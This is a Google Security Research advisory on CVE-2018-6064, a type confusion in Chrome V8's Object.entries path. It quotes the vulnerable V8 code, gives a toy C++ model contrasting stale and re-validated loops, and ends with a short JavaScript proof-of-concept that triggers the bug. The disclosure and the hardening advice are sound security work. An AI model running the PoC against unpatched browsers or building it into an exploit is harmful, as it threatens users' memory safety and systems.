Chrome V8 ElementsAccessorBase::CollectValuesOrEntriesImpl Type Confusion

Source: Google Security Research, via packetstormsecurity.com (PACKETSTORM:147025)
Published: Apr 03, 2018
EPSS: 0.584 (Medium), percentile 97.4%
`Chrome: V8: Type confusion in ElementsAccessorBase::CollectValuesOrEntriesImpl

CVE-2018-6064

Here's a snippet of the method (V8 elements.cc at the linked revision):
https://cs.chromium.org/chromium/src/v8/src/elements.cc?rcl=3cbf26e8a21aa76703d2c3c51adb9c96119500da&l=1051
  
```cpp
static Maybe<bool> CollectValuesOrEntriesImpl(
    Isolate* isolate, Handle<JSObject> object,
    Handle<FixedArray> values_or_entries, bool get_entries, int* nof_items,
    PropertyFilter filter) {
  ...
  for (int i = 0; i < keys->length(); ++i) {
    Handle<Object> key(keys->get(i), isolate);
    Handle<Object> value;
    uint32_t index;
    if (!key->ToUint32(&index)) continue;
    uint32_t entry = Subclass::GetEntryForIndexImpl(
        isolate, *object, object->elements(), index, filter);
    if (entry == kMaxUInt32) continue;

    PropertyDetails details = Subclass::GetDetailsImpl(*object, entry);

    if (details.kind() == kData) {
      value = Subclass::GetImpl(isolate, object->elements(), entry);
    } else {
      LookupIterator it(isolate, object, index, LookupIterator::OWN);
      ASSIGN_RETURN_ON_EXCEPTION_VALUE(
          isolate, value, Object::GetProperty(&it), Nothing<bool>());  // <<------- (a)
    }
    if (get_entries) {
      value = MakeEntryPair(isolate, index, value);
    }
    values_or_entries->set(count++, *value);
  }

  *nof_items = count;
  return Just(true);
}
```
  
At (a), Object::GetProperty can invoke a user-defined getter, and that getter can change the object's elements kind. The loop keeps using the Subclass that was chosen for the original kind, so on the next iteration GetEntryForIndexImpl runs against elements of a different kind. This leads to type confusion in GetEntryForIndexImpl.
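The bug class is easier to see in a small model than in the engine itself. The C++ below is an added example written for this page; it is not V8 code and not V8's actual fix. It uses a hypothetical ToyObject whose backing store is a vector of raw 64-bit words read according to an "elements kind", plus a user getter attached to one index. CollectStaleKind caches the kind and length before the loop, the way the snippet above fixes Subclass for the whole loop, so a getter that transitions the store leaves later reads using the wrong interpretation. CollectFreshKind re-fetches both after every callback, which is the general defensive rule: nothing resolved before user code ran is trustworthy after it. All names, sample values and the getter body are constructed for the example.

```cpp
#include <cstdint>
#include <cstring>
#include <functional>
#include <iostream>
#include <vector>

// Toy model (hypothetical, not V8's data structures): a backing store of raw
// 64-bit words plus the "elements kind" that says how those words are read.
enum class ElementsKind { kSmi, kDouble };

struct ToyObject {
  ElementsKind kind = ElementsKind::kSmi;
  std::vector<uint64_t> slots;               // raw words, interpreted per kind
  long getter_index = -1;                    // index backed by an accessor, or -1
  std::function<double(ToyObject&)> getter;  // user code run when that index is read
};

// Read slot i under `kind`. memcpy keeps the toy free of undefined behaviour;
// in the real engine a stale kind means reading memory with the wrong layout.
static double ReadSlot(const ToyObject& o, ElementsKind kind, size_t i) {
  uint64_t raw = o.slots[i];
  if (kind == ElementsKind::kSmi) return static_cast<double>(static_cast<int64_t>(raw));
  double d;
  std::memcpy(&d, &raw, sizeof d);
  return d;
}

// Transition kSmi -> kDouble, rewriting every word as a double bit pattern
// (the toy analogue of what storing a double into a Smi array does).
static void TransitionToDouble(ToyObject& o) {
  if (o.kind == ElementsKind::kDouble) return;
  for (uint64_t& raw : o.slots) {
    double d = static_cast<double>(static_cast<int64_t>(raw));
    std::memcpy(&raw, &d, sizeof raw);
  }
  o.kind = ElementsKind::kDouble;
}

// Vulnerable pattern: kind and length are resolved once, user code runs inside
// the loop, and later reads still use the stale kind.
static std::vector<double> CollectStaleKind(ToyObject& o) {
  std::vector<double> out;
  ElementsKind kind = o.kind;   // cached before any getter can run
  size_t n = o.slots.size();    // cached as well
  for (size_t i = 0; i < n; ++i) {
    if (static_cast<long>(i) == o.getter_index) {
      out.push_back(o.getter(o));  // may transition the object
      continue;
    }
    out.push_back(ReadSlot(o, kind, i));  // stale interpretation after a transition
  }
  return out;
}

// Hardened pattern: nothing read before a user callback is trusted after it.
// Kind and length are re-fetched on every iteration.
static std::vector<double> CollectFreshKind(ToyObject& o) {
  std::vector<double> out;
  for (size_t i = 0; i < o.slots.size(); ++i) {   // length re-read each time
    if (static_cast<long>(i) == o.getter_index) {
      out.push_back(o.getter(o));
      continue;
    }
    out.push_back(ReadSlot(o, o.kind, i));        // kind re-read each time
  }
  return out;
}

// Constructed sample: Smi 7, an accessor at index 1, Smi 0x1234. The accessor
// transitions the store to doubles and, optionally, empties it (the analogue
// of the PoC's unshift(1.1) followed by length = 0).
static ToyObject MakeSample(bool shrink_too) {
  ToyObject o;
  o.slots = {7, 0, 0x1234};
  o.getter_index = 1;
  o.getter = [shrink_too](ToyObject& obj) {
    TransitionToDouble(obj);
    if (shrink_too) obj.slots.clear();
    return 1.1;
  };
  return o;
}

static std::vector<double> RunStale() { ToyObject o = MakeSample(false); return CollectStaleKind(o); }
static std::vector<double> RunFresh() { ToyObject o = MakeSample(false); return CollectFreshKind(o); }
// Only the hardened loop is run on the shrinking sample: the stale loop would
// index past the end of the store, which is the memory-safety consequence.
static std::vector<double> RunFreshShrinking() { ToyObject o = MakeSample(true); return CollectFreshKind(o); }

int main() {
  for (double v : RunStale()) std::cout << v << ' ';   // third value is garbage
  std::cout << '\n';
  for (double v : RunFresh()) std::cout << v << ' ';   // 7 1.1 4660
  std::cout << '\n';
  std::cout << RunFreshShrinking().size() << " entries after the store was emptied\n";
  return 0;
}
```

The stale loop returns the third element as a huge integer (the bit pattern of the double 4660.0 read as an int64), while the fresh loop returns 4660; on the emptied store the fresh loop stops after the getter instead of walking off the end. The same discipline applies to any engine or parser that invokes callbacks mid-iteration: re-validate length, kind and backing-store pointers after every call that can run untrusted code.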
  
PoC:

```javascript
let arr = [];
arr[1000] = 0x1234;

arr.__defineGetter__(256, function () {
  delete arr[256];

  arr.unshift(1.1);
  arr.length = 0;
});

Object.entries(arr).toString();
```
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Found by: lokihardt

`